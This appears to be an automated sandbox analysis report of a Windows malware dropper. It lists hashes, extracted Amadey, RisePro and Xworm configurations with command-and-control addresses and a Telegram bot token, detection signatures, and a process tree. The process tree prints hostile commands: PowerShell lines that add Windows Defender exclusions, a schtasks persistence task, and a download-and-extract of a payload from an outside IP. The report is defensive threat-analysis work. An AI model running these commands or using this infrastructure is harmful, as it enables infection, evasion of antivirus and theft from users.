Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
-
submitted
13-05-2024 14:22
General
-
Target
71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe
-
Size
1.7MB
-
MD5
d5be6b852722db508fdb29104d5aa037
-
SHA1
89e8ea27ef760ee059731380397446c1cf03c55d
-
SHA256
71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94
-
SHA512
ba62ca856fb72f3a68edc50bbb8e8ab914d6f9526d5d84a92ff0f25aa57e149e742e881bf7a967f3a40b445725fffd6d1f6f141f94fe9f271fb04103761b516b
-
SSDEEP
24576:7MkBOGtVfX0WrHsyNrIngnjP/+it6rVx5KiHtpSEMbTRjc55wIVWhvi1Frm7mKj:IkB/LfrHRTjOi+3KiNY5smmwa1mmc
Malware Config
Extracted
http://193.222.96.193:81/besho/besho.mp4
Extracted
amadey
4.20
http://5.42.96.141
http://5.42.96.7
-
install_dir
908f070dff
-
install_file
explorku.exe
-
strings_key
b25a9385246248a95c600f9a061438e1
-
url_paths
/go34ko8/index.php
Extracted
risepro
147.45.47.126:58709
Extracted
xworm
127.0.0.1:7000
beshomandotestbesnd.run.place:7000
-
Install_directory
%ProgramData%
-
install_file
taskmgr.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Detect Xworm Payload 2 IoCs
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 14 IoCs
-
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 52 IoCs
Detects Themida, an advanced Windows software protection system.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks whether UAC is enabled 1 TTPs 6 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 10 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 31 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe"C:\Users\Admin\AppData\Local\Temp\71bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\taskmgr.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "taskmgr" /tr "C:\ProgramData\taskmgr.exe"6⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\ssa.vbs"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $webClient = New-Object System.Net.WebClient; $webClient.Credentials = New-Object System.Net.NetworkCredential('dd', 'mn...123456'); $webClient.DownloadFile('http://193.222.96.193:81/besho/besho.mp4', 'C:\Users\Public\Documents\max3d.zip'); Expand-Archive -Path 'C:\Users\Public\Documents\max3d.zip' -DestinationPath 'C:\Users\Public\Documents\' -Force7⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
C:\Users\Admin\1000006002\b26503bc6d.exe"C:\Users\Admin\1000006002\b26503bc6d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\taskmgr.exeC:\ProgramData\taskmgr.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exeC:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
733B
MD568c8c79d84f5e3f10dd9328272b0ac55
SHA15ab9a13ec0d01fc1ed71c27a1a23a61019cb8946
SHA25629841f038da6a26dac5df28f23b4adcb080f5b0a2312bf996c8073940849eef6
SHA512d86bd0ac3bd58ee9a1b06e1edba3c03788136292d81bd9cf025525c3a0e40bba9a7b6d5859833a9d470d29ab31b35d5515855a78691bfe54477631d9a0733f6a
-
Filesize
2.1MB
MD5ea46597fd930b2febc255656c123cce6
SHA1e8247e4502dcbab1678ad1062357c7a3183e5a04
SHA256b3010f5232a4d132e18d49b08c9ab0961abfd0680806cbff7cfd5598838c0ff0
SHA5126af55ca85337d1e2e59bd020126179ae72eca7a41e4c2b5199ba0aea281d98307b014da31c49d6f152cbb3e0af785918ca0cf404aad3ab40fec6c6bf104350d3
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
MD5856900844f6f1c326c89d0bcfb2f0c28
SHA11caad440d46fa8c0cbed4822b4be2bbdddba97c2
SHA256ae24414ec53b3ae43ddbf1ff7b6643f8bf45281406f6415742f4305360d70a32
SHA512ed8f421e151d797b33440dd0ddb6d6a5ec93fe7806ad82c60af3f77d545cf5dc319bce67804bd0613bb551a3f01648ec0d1918805dc7342145c8bb23ad12cab4
-
Filesize
944B
MD5f8c40f7624e23fa92ae2f41e34cfca77
SHA120e742cfe2759ac2adbc16db736a9e143ca7b677
SHA256c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b
SHA512f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7
-
Filesize
944B
MD521017c68eaf9461301de459f4f07e888
SHA141ff30fc8446508d4c3407c79e798cf6eaa5bb73
SHA25603b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888
SHA512956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d
-
Filesize
1.8MB
MD5a522a3d64b6e57e8cf9c5e390d7db83a
SHA107f4c37b9b0a0e331b5d7088549caed05eb5794b
SHA256f10c4a499b5f7e8d26ff0397ceaf94ea3d3ba43617087ea68b2cb43b99da0f30
SHA51214a6d5c64c11ddb2d4be7df2d11c082f265b7492d76270282a60592118701c520a625aa4fb3be4676325aed1b126f7f3a1975e885adbdebf12ff3c499676e398
-
Filesize
199KB
MD573309cc961f9645c1c2562ffcdc2dab1
SHA16a8545c08c931e016198c80b304ade1c1e8f7a17
SHA256287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298
SHA51289858a407acbc7c13a4bd40031abd6803c311d381a37702631b1739d9f0e67c6afae50e6d1188b54a7d0e1ddfbcb6857b68f8f44cad3b10b1b31b53f1b676914
-
Filesize
1.7MB
MD5d5be6b852722db508fdb29104d5aa037
SHA189e8ea27ef760ee059731380397446c1cf03c55d
SHA25671bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94
SHA512ba62ca856fb72f3a68edc50bbb8e8ab914d6f9526d5d84a92ff0f25aa57e149e742e881bf7a967f3a40b445725fffd6d1f6f141f94fe9f271fb04103761b516b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
4.6MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
4.6MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
6.4MB
-
Filesize
6.4MB
-
Filesize
6.4MB
-
Filesize
6.4MB
-
Filesize
6.4MB
-
Filesize
6.4MB
-
Filesize
6.4MB
-
Filesize
6.4MB
-
Filesize
6.4MB
-
Filesize
6.4MB
-
Filesize
136KB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
3.3MB
-
Filesize
56KB
-
Filesize
224KB
-
Filesize
40KB
-
Filesize
1.1MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
5.3MB
-
Filesize
4.6MB
-
Filesize
8KB
-
Filesize
4.6MB